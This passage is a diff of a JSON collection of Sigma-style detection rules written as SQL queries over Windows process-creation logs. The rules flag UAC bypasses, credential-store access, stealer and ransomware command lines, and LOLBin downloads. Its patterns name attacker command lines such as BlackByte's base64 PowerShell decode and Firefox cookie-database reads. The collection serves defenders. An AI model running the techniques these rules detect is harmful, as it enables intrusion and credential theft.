Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", + "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "status": "experimental", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Legitimate use of cmstp.exe utility by legitimate user" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR 
CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml" + "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" }, { - "title": "Renamed NetSupport RAT Execution", - "id": "0afbd410-de03-4078-8491-f132303cb67d", + "title": "Renamed Vmnat.exe Execution", + "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", "status": "experimental", - "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "author": "elhoim", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'vmnat.exe' AND NOT ((NewProcessName LIKE '%vmnat.exe' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_renamed_netsupport_rat.yml" + "filename": "proc_creation_win_renamed_vmnat.yml" }, { - "title": "Windows Admin Share Mount Via Net.EXE", - "id": "3abd6094-7027-475f-9630-8ab9be7b9725", - "status": "test", - "description": "Detects when an admin share is mounted using net.exe", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "title": "Suspicious Add Scheduled Task Parent", + "id": "9494479d-d994-40bf-a8b1-eea890237021", + "status": "experimental", + "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Administrators" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '% \\\\%\\\\%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%unattended.ini%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_net_use_mount_admin_share.yml" + "filename": "proc_creation_win_schtasks_parent.yml" }, { - "title": "Sensitive Registry Access via 
Volume Shadow Copy", - "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "status": "experimental", - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "Suspicious RazerInstaller Explorer Subprocess", + "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "status": "test", + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", "tags": [ - "attack.impact", - "attack.t1490" + "attack.privilege_escalation", + "attack.t1553" ], "falsepositives": [ - "Some rare backup scenarios" + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + }, + { + "title": "Potential Commandline Obfuscation Using Unicode Characters", + "id": "e0552b19-5a83-4222-b141-b36184bb8d79", + "status": "test", + "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an 
executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", + "author": "frack113, Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" }, { - "title": "Exchange PowerShell Snap-Ins Usage", - "id": "25676e10-2121-446e-80a4-71ff8506af47", + "title": "Suspicious WebDav Client Execution", + "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", "status": "experimental", - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", - "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. 
This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.collection", - "attack.t1114" + "attack.exfiltration", + "attack.t1048.003", + "cve.2023.23397" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-s WebClient%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE 
'%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml" + "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" }, { - "title": "Winword LOLBIN Usage", - "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", + "title": "New Generic Credentials Added Via Cmdkey.EXE", + "id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", "status": "experimental", - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community", + "description": "Detects usage of cmdkey to add generic credentials. 
As an example, this has to be used before connecting to an RDP session via command line interface.", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate usage for administration purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /g%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_winword.yml" + "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml" }, { - "title": "Suspicious Greedy Compression Using Rar.EXE", - "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "title": "PUA - NirCmd Execution", + "id": "4e2ed651-1906-4a59-a78a-18220fca1b22", "status": "experimental", - "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", - "author": "X__Junior, Florian Roth", + "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], - 
"level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NirCmd.exe' ESCAPE '\\' OR OriginalFileName = 'NirCmd.exe' OR (CommandLine LIKE '% execmd %' ESCAPE '\\' OR CommandLine LIKE '%.exe script %' ESCAPE '\\' OR CommandLine LIKE '%.exe shexec %' ESCAPE '\\' OR CommandLine LIKE '% runinteractive %' ESCAPE '\\')) OR ((CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% exec2 %' ESCAPE '\\') AND (CommandLine LIKE '% show %' ESCAPE '\\' OR CommandLine LIKE '% hide %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rar_susp_greedy_compression.yml" + "filename": "proc_creation_win_pua_nircmd.yml" }, { - "title": "Hiding Files with Attrib.exe", - "id": "4281cb20-2994-4580-aa63-c8b86d019934", - "status": "test", - "description": "Detects usage of attrib.exe to hide files from users.", - "author": "Sami Ruohonen", + "title": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE", + "id": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5", + "status": "experimental", + "description": "Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as 
observed in reports and samples in early 2023", + "author": "TropChaud", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1218.011" ], "falsepositives": [ - "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", - "Msiexec.exe hiding desktop.ini" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +h %' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\desktop.ini %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '+R +H +S +A \\\\\\*.cui' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'RUNDLL32.EXE' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\') AND CommandLine LIKE '%nsis\\_uns%' ESCAPE '\\' AND CommandLine LIKE '%PrintUIEntry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_attrib_hiding_files.yml" + "filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml" }, { - "title": "User Discovery And Export Via Get-ADUser Cmdlet", - "id": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "title": "SQLite Firefox Profile Data DB Access", + "id": "4833155a-4053-4c9c-a997-777fcea0baa7", "status": "experimental", - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1539", + "attack.collection", + "attack.t1005" ], 
"falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADUser %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml" + "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" }, { - "title": "Suspicious Compression Tool Parameters", - "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "status": "test", - "description": "Detects suspicious command line arguments of common data compression tools", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Suspicious File Download via CertOC.exe", + "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "status": "experimental", + "description": "Detects when a user downloads file by using CertOC.exe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_compression_params.yml" + "filename": "proc_creation_win_lolbin_certoc_download.yml" }, { - "title": "Rundll32 Registered COM Objects", - "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "title": "Potential BlackByte Ransomware Activity", + "id": "999e8307-a775-4d5f-addc-4855632335be", "status": "test", - "description": "load malicious registered COM objects", - "author": "frack113", - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" - ], + "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine 
LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_registered_com_objects.yml" + "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" }, { - "title": "DevInit Lolbin Download", - "id": "90d50722-0483-4065-8e35-57efaadd354d", + "title": "Potential SystemNightmare Exploitation Attempt", + "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", "status": "test", - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", + "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devinit.yml" + "filename": "proc_creation_win_exploit_other_systemnightmare.yml" }, { - "title": "Process Dump via RdrLeakDiag.exe", - "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "title": "UAC Bypass Using MSConfig Token Modification - Process", + 
"id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", "status": "test", - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "author": "Cedric MAURUGEON", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND OriginalFileName = 'RdrLeakDiag.exe' AND CommandLine LIKE '%fullmemdmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" ], - "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Change Default File Association To Executable Via Assoc", - "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", - "status": "experimental", - "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. 
Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via Netsh Helper DLL", + "id": "56321594-9087-49d9-bf10-524fe8479452", + "status": "test", + "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", + "author": "Victor Sergeev, oscd.community", "tags": [ + "attack.privilege_escalation", "attack.persistence", - "attack.t1546.001" + "attack.t1546.007", + "attack.s0108" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" + "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" }, { - "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", - "id": "452bce90-6fb0-43cc-97a5-affc283139b3", - "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious RASdial Activity", + "id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", + "status": "test", + 
